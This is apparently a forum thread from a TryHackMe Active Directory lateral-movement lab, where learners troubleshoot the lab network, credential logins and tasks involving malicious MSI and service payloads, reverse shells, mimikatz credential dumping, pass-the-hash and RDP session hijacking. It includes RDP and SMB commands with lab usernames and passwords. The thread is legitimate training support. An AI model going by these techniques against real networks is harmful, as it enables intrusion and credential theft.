Suggestion:
Adding Chisel to the port forwarding task!
One more vote for a reset please!
Hello. On task 4. I get a ReturnValue 1620 when I try to execute my malicious installer. I have checked everything 100 times and cannot quite get my head around why it says it is missing..
partial path vs full path
command PackageLocation = "C:\Windows\Myfile.msi"
Tried it from the attack box. But there I get ReturnValue 1603. I even, out of curiosity, SSH'd in to thmiis and found both my payloads sitting in C:\windows
But I can't get the wmic thing to work!!! Arrgh
Hello!
I have a problem, I connected via vpn and I also set the dns address correctly and I tried network reset many times but I still can't access http://distributor.za.tryhackme.com/creds, does anyone know what it is problem?
Up!
and you have the correct openvpn file?
also i try with attack box
yes i download from the network and also , i check and i'm connected
try the credentials from t1_corine.waters in task3
if that works the site is just down.
but if that doesn't work vote Reset on the machine.
have you also checked cat /etc/resolv.conf that the network is posted in there?
can you tell me what I need to put in resolv.conf?
the ip for thmdc.za.tryhackme.com
nameserver and ip ?
and still no access to site or ssh into server?
Hey there, can you send a capture of your resolv.conf? That way I might be able to pinpoint the problem
oh, and you need to verify before you can send screenshots
!docs verify
Hey there, this probably means someone deleted it. Please reset the network to get the executable back.
@shadow linden thanks. Even the reset had to be requested by 5 people.
Gave +1 Rep to @shadow linden
However, I did it the next day and it worked. Thanks
That's great to know!
In task 4 i have executed the reverse shell but unable to read the Flag.exe ! What could be the reason !? It says i missed something!!
Trying with attackbox
I figured it out !
Hint: don't ssh to the wrong machine
As we have admin credentials, it's possible to log in to other machines!
looks like this room's server is down
I finished task 3 now it's not responding at all
I am also connected via VPN but i can't ping the THMDC or THMIIS
i completed adbasics, breaching AD room, so definitely my settings are all correct
nslookup thmdc.za.tryhackme.com fails as well
Tried the next room "Exploiting Active Directory" and everything is working fine
so something is wrong with "Lateral Movement Lab"
Is the server down? My VPN is not working
@shadow linden any ideas why i am getting "Sorry! You are still missing something. No flag for you yet. (1)" for task 3 ? i am on the correct host with correct user. Screenshot given. I used new-pssession.
I also tried psexec thinking may be i need system privileges, also tried with local administrator but same output
Hey there, while you can use any of the methods in the room, that flag will only be available if you follow the proposed method
this is kind of a limitation in the room in itself, so sorry for that
Hi , can't RDP in the THMJMP2 instance.
Tried xfreerdp, remmina, and rdesktop.
xfreerdp:
[17:04:18:131] [4601:4602] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[17:04:18:131] [4601:4602] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
[17:04:19:238] [4601:4602] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[17:04:19:238] [4601:4602] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[17:04:19:238] [4601:4602] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[17:04:19:238] [4601:4602] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
rdesktop:
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect, CredSSP required by server.
Can SSH into the instance just fine with the same creds :{
Weird but it works in the Attackbox. I reckon some VPN issues though I'm using the correct network.
Even after reset the nslookup isn't working for the DC. But the credential URL is working.
nslookup thmdc.za.tryhackme.com
;; Got recursion not available from 10.200.64.101, trying next server
I'll vote for a reset, but there is something wrong with that room.
Reset in progress
Same issues after reset.
Anyone else finding that JMP2 is not reachable? seem to have been kicked off the rdp session I had whilst I was making notes..
Eventually got the votes to reset, lets see..
Well, no idea what broke but resetting did the trick
Hello, has anyone been able to get Task 6 to work? I get license connection sequence aborted. when I try the suggested use of xfreerdp. I was able to login by adding /admin but the server had no t1_toby.beck's RDP session to hijack.
Any ideas, @rose kernel @muted palm @brazen frigate @shadow linden?
Taking a look at this
Thanks! Were you able to reproduce and make any progress on the issue?
I have the same issue as well.
Yes, this has been reproduced and we'll implement a solution in a bit π
Thank you!
Awesome, thanks!
Gave +1 Rep to @shadow linden
I am facing this issue as well. Run all mimikatz commands as explained but never see authentication material for t1_toby.beck
I've had the same problem on the 10.200.71.x subnet. I waited for the network to time out, did a reset, then waited another 20 mins after it had restarted. In the end, I copied the hash from Tyler's video, just so that I could move on with the exercise.
NB At that point, when I re-ran sekurlsa::msv I did see a hash for that account, but I'm pretty sure that's just come from my pth command.
As a side note, I think the Kerberos blurb in task 5 is slightly incorrect. It says that the KDC will send a TGS to the user.
As I understand it:
- The KDC contains the Authentication Service (AS) and the Ticket Granting Service (TGS).
- The AS will issue a Ticket Granting Ticket (TGT).
- The TGS will issue a service ticket (no acronym?).
I.e. the TGS (like any other service) is a program that runs on a server, not a data file.
@slim shuttle @storm sentinel There's a problem with the network at the moment. The fix is on the way. Sorry for the inconvenience
In task 3 when uploading the malicious service executable, I tried to smbclient and get a prompt but it doesn't return me anything, is the IP address the problem, its showing my eth0 when im connected to the VPN:
root@kali:~/Desktop/thm/lateralmov_and_pivot# smbclient //thmiis.za.tryhackme.com/$admin -U t1_leonard.summers -W ZA -d 3
lp_load_ex: refreshing parameters
Initialising global parameters
rlimit_max: increasing rlimit_max (1024) to minimum Windows limit (16384)
Processing section "[global]"
added interface eth0 ip=192.168.115.128 bcast=192.168.115.255 netmask=255.255.255.0
Password for [ZA\t1_leonard.summers]:
Client started (version 4.16.3-Debian).
@tulip tree @tranquil seal @slim shuttle @storm sentinel The issue should now be resolved. You may need to reset the network if for some reason it hasn't reset since yesterday, but everything should work now
Your command looks good. When you say you get a prompt, how does it look like?
Good news: the RDP issue has been fixed, i.e. I no longer get a cryptic error from xfreerdp.
Bad news: it won't accept the credentials from the "creds_t2" website. (I tried regenerating them, but both sets failed.)
can you send the command and credentials you are using?
I've tried 2 sets of credentials for the 10.200.71.x subnet:
xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_charlie.holland /p:Five2016
xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_george.kay /p:Jght9206
I also tried using /d:za.tryhackme.com as an extra argument, but that didn't help.
Let me check if I can replicate this
Thanks. The network up time is 5h 27m, but I don't know whether it's actually been reset since yesterday. I've requested a reset, and it's now on 4/5.
Gave +1 Rep to @shadow linden
if RDP is working, then it has been reset
xfreerdp /v:thmjmp2.za.tryhackme.com /u:za\\t2_george.kay /p:Jght9206 should work
if it doesn't in your network, then it probably needs a reset
your command also works as-is against my network
That doesn't work for me. It looks more like the problem I had before, i.e. it won't even display the RDP window. So, it sounds like this network needs a reset. If anyone else can cast the final vote, that would be handy, or I'll just wait an hour and try again
Fantastic Thank you!
Just to confirm, after a reset it works fine. These 3 commands all give an RDP session with no errors:
xfreerdp /v:thmjmp2.za.tryhackme.com /d:za.tryhackme.com /u:t2_george.kay /p:Jght9206
xfreerdp /v:thmjmp2.za.tryhackme.com /u:za\\t2_george.kay /p:Jght9206
xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_george.kay /p:Jght9206
I.e. you can specify the domain name as a separate argument (/d), or in the username (za\\), or not at all.
